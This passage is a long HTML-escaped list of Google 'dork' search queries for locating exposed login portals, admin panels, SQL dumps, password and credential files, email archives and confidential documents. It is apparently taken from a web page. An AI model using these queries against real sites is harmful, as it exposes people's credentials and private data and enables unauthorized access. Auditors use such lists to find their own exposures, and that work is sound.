255);"&gt;IlohaMail”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:ilohamail intext:”Version 0.8.10″ ”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;IlohaMail”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:IMP inurl:imp/index.php3&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Login * Webmailer&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Login intext:”RT is ? Copyright”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Node.List Win32.Version.3.11&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:open-xchange inurl:login.pl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Ovislink inurl:private/login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:phpnews.login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:plesk inurl:login.php3&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”/admin/configuration. php?” Mystore&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”1220/parse_xml.cgi?”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”:10000″ intext:webmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”Activex/default.htm” “Demo”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”calendar.asp?action=login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”default/login.php” intitle:”kerio”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”gs/adminlogin.aspx”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”php121login.php”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”suse/login.pl”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”typo3/index.php?u=” -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”usysinfo?login=true”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”utilities/TreeView.asp”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Code:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;nurl:/admin/login.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/cgi-bin/sqwebmail?noframes=1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/Citrix/Nfuse17/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/dana-na/auth/welcome.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/eprise/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/modcp/ intext:Moderator+vBulletin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/SUSAdmin intitle:”Microsoft Software upd?t? Services”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/webedit.* intext:WebEdit Professional -html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:1810 “Oracle Enterprise Manager”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl::2082/frontend -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:administrator “welcome to mambo”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:cgi-bin/ultimatebb.cgi?ubb=login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:Citrix/MetaFrame/default/default.aspx&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:confixx inurl:login|anmeldung&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:coranto.cgi intitle:Login (Authorized Users Only)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:csCreatePro.cgi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:default.asp intitle:”WebCommander”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:exchweb/bin/auth/owalogon.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:gnatsweb.pl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ids5web&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:irc filetype:cgi cgi:irc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:login filetype:swf swf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:login.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:login.cfm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:login.php “SquirrelMail version”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:mewebmail&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:names.nsf?opendatabase&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ocw_login_username&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:orasso.wwsso_app_admin.ls_login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:postfixadmin intitle:”postfix admin” ext:php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:search/admin.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:textpattern/index.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:WCP_USER&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:webmail./index.pl “Interface”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:webvpn.html “login” “Please enter your”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Login (”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Jetbox One CMS â?¢” | ”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Jetstream ? *”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Novell NetWare intext:”netware management portal version”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Outlook Web Access (a better way)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;PhotoPost PHP Upload&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;PHPhotoalbum Statistics&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;PHPhotoalbum Upload&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;phpWebMail&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Please enter a valid password! inurl:polladmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;INDEXU&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Ultima Online loginservers&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;W-Nailer Upload Area&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”DocuShare” inurl:”docushare/dsweb/” -faq -gov -edu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“#mysql dump” filetype:sql&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“#mysql dump” filetype:sql 21232f297a57a5a743894a0e4a801fc3&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“allow_call_time_pass_reference” “PATH_INFO”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Certificate Practice Statement” inurl:(PDF | DOC)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Generated by phpSystem”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“generated by wwwstat”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Host Vulnerability Summary Report”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“HTTP_FROM=googlebot” googlebot.com “Server_Software=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Index of” / “chat/logs”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Installed Objects Scanner” inurl:default.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“MacHTTP” filetype:log inurl:machttp.log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Mecury Version” “Infastructure Group”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Most Submitted Forms and s?ri?ts” “this section”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Network Vulnerability Assessment Report”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“not for distribution” confidential&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“not for public release” -.edu -.gov -.mil&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“phpMyAdmin” “running on” inurl:”main.php”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“produced by getstats”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Request Details” “Control Tree” “Server Variables”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“robots.txt” “Disallow:” filetype:txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Running in Child mode”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“sets mode: +p”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“sets mode: +s”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Thank you for your order” +receipt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“This is a Shareaza Node”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“This report was generated by WebLog”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher – Monitoring Results”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;+”:8080″ +”:3128″ +”:80″ filetype:txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;+”HSTSNR” -”netop.com”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;-site:php.net -”The PHP Group” inurl:source inurl:url ext:pHp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;94FBR “ADOBE PHOTOSHOP”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;AIM buddy lists&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:/examples/jsp/snp/snoop.jsp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:cdkey.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:servlet/SnoopServlet&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;cgiirc.conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;cgiirc.conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;contacts ext:wml&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;data filetype:mdb -site:gov -site:mil&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;exported email addresses&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:asp inurl:pathto.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:ccm ccm -catacomb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:CDX CDX&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:cgi inurl:editcgi.cgi inurl:file=&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:conf inurl:rsyncd.conf -cvs -man&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:conf NoCatAuth -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:dat bpk.dat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:gho gho&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:ics ics&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:ini intext:env.ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:jbf jbf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:ldif ldif&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:log “Software: Microsoft Internet Information Services *.*”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:mdb inurl:*.mdb inurl:fpdb shop.mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:nsf nsf -gov -mil&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:plist filetype:plist inurl:bookmarks.plist&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:pqi pqi -database&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:reg “username=*” putty&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:txt “Final encryption key”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:txt inurl:dxdiag&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:vmdk vmdk&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:vmx vmx&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:asp DBQ=” * Server.MapPath(“*.mdb”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:bkf bkf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:blt “buddylist”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:blt blt +intext:screenname&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:cfg auto_inst.cfg&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:cnf inurl:_vti_pvt access.cnf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:conf inurl:firewall -intitle:cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:config web.config -CVS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ctt Contact&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ctt ctt messenger&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:fp3 fp3&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:fp5 fp5 -site:gov -site:mil -”cvs log”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:fp7 fp7&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:inf inurl:capolicy.inf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:lic lic intext:key&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:log access.log -CVS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:log cron.log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:mbx mbx intext:Subject&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:myd myd -CVS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ns1 ns1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ora ora&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ora tnsnames&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pdb pdb backup (Pilot | Pluckerdb)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pot inurl:john.pot&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:PS ps&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pst inurl:”outlook.pst”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pst pst -from -to -date&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:qbb qbb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:QBW qbw&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:rdp rdp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:reg “Terminal Server Client”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:vcs vcs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:wab wab&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:xls -site:gov inurl:contact&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:xls inurl:”email.xls”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Financial spreadsheets: finance.xls&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Financial spreadsheets: finances.xls&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Ganglia Cluster Reports&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;haccess.ctl (one way)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;haccess.ctl (VERY reliable)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ICQ chat logs, please…&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Session Start * * * *:*:* *” filetype:log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Tobias Oetiker” “traffic analysis”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:(password | passcode) intext:(username | userid | user) filetype:csv&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:gmail invite intext:http://gmail.google.com/gmail/a&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:SQLiteManager inurl:main.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:ViewCVS inurl:Settings.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”admin panel” +”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;RedKernel”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”AppServ Open Project” -site:www.appservnetwork.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”&lt;/span&gt;&lt;br /&gt;&lt;br 